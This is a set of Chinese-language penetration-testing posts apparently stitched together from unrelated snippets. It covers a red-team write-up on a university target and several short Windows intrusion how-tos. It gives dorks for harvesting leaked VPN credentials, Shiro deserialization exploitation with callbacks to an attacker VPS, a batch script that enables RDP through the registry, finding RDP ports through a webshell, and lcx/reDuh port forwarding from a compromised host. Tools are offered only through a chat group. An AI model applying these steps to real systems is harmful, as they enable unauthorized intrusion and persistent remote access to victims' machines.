前言 这次攻防演练每个队伍分配不同的目标，有些队伍拿的点可以直接 nday 打，有些队伍外网打点十分困难比如我们，但分数是是统一算的，可以说不是那么的公平。不过也算是提供了些许经验，简单做一下总结，都是比较基础的东西，如有写的不正确的地方欢迎各位师傅指正。 外网打点 敏感信息泄露 一般来说学校外网能拿直接权限的点已经很少了，web 应用大多是放在 vpn 后面，因此能弄到一个 vpn 账号可以说是事半功倍 另外还可以通过语法筛选出存在默认弱口令的系统，常用命令如下： PLAINTEXT 1 2 3 4 5 6 7 #google语法 site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码     #github*.edu.cn password   查看方式优先选择最近更新，太久远的基本上失效了 这里队友收集到了某个目标的 vpn 账号，使用的是 姓名拼音/12345678 弱口令 进去内网后能访问的只有一个 OA 系统，测试了一下没发现什么东西，寻找其他突破口 shiro 无链 常规的打点可通过 fofa、hunter、quake 等网络测绘平台进行资产收集，收集好后进行去重，把去重后的资产列表进行批量指纹识别，筛选出重要易打点的系统 在常规的 hw 中这些方法比较通用，但是对于教育行业来说会相对困难，有 edusrc 的存在许多通用型漏洞已经被提交修复了，因此在信息搜集的时候要多去寻找旁站和一些容易被遗漏的站点 坐了一天牢后，终于通过测绘平台找到一个比较偏的资产，直接访问是一个静态页面，但扫描目录后指纹识别一波发现是 shiro 直接工具开冲，发现有默认 key 但是无利用链 这里想到之前学习 shiro 可以无依赖利用，感觉有戏尝试一波，相关知识可学习此文章 https://www.le1a.com/posts/a5f4a9e3/ PLAINTEXT 12 java -jar shiro_tool.jar 地址VPS:端口 通过 dnslog 测试有回显，这里有个注意点：使用 http://dnslog.cn/部分站点会拦截，可以换多个 dnslog 平台测试 dnslog 有回显接下来就是拿 shell 了，这里由于固化思维，之前遇到的都是 linux 系统，先入为主觉得是 Linux，结果没利用成功 这里可以通过网站快速生成 payload，https://x.hacking8.com/java-runtime.html 一开始以为是防火墙拦截，后面队友探测了一下目录结构，发现是 windows，所以这里 payload 要改变一下 Linux：   ...

一、查询远程连接的端口 1、命令查询，win7/win10/win2003都可以使用 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 0xd3d转换十进制是3389 2、注册表查询 二、开启3389端口的方法 1、工具开启 2、批处理开启，将下面代码复制到bat文件，双击自行开启远程连接 echo Windows Registry Editor Version 5.00>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.regecho "fDenyTSConnections"=dword:00000000>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regregedit /s 3389.regdel 3389.reg 三、当3389端口被修改后，如何查找 1、通过大马的读注册表、找到3389端口，然后读取 2、通过大马的cmd命令 tasklist /svc,获取termservice的pid号 再执行netstat -ano查找2684对应的的端口就是远程连接端口 3、通过工具扫描 工具下载方式：加入交流群 注意：软件均来自网络，不能保证安全性 ...

一、环境： 1、内网主机IP：192.168.1.106  win2003 2、假设外网主机ip：192.168.1.104 win7 二、通过大马上传lcx.exe到服务器内网 1、将内网3389端口转发到外网2222端口 lcx.exe -slave 192.168.1.104 2222 127.0.0.1 3389 2、在攻击机win7监听2222本地端口，转发到4444端口 lcx.exe -listen 2222 4444 3、在攻击机win7中远程连接 三、利用工具转发reDuh 1、将软件自带的脚本拷贝到服务器中，根据不同环境，选择不同脚本 2、打开reDuh，将脚本文件上传的路径填写到URL，点击start，再点击create 3、打开远程连接，这个有点缓慢，但是可以连接成功的，详细见交流群视频教程 工具下载方式：加入交流群 ...

一、访问上传的木马文件 http://192.168.1.104/1.asp 二、点击F12，打开谷歌自带的开发人员工具，点击network 三、输入密码，看看抓包情况，该木马会自动向某网站上传木马路径和密码 四、查看木马源文件，然后搜索该网址，随便修改为一个无效地址，该木马用的是反转加密，所以我们搜索不到，有时候是其他加密，需要解密才可以修改 注意：抓包的时候，有的后门不是一登录就发送的，也有可能停一段时间才发送，甚至当你退出的时候才发送 ...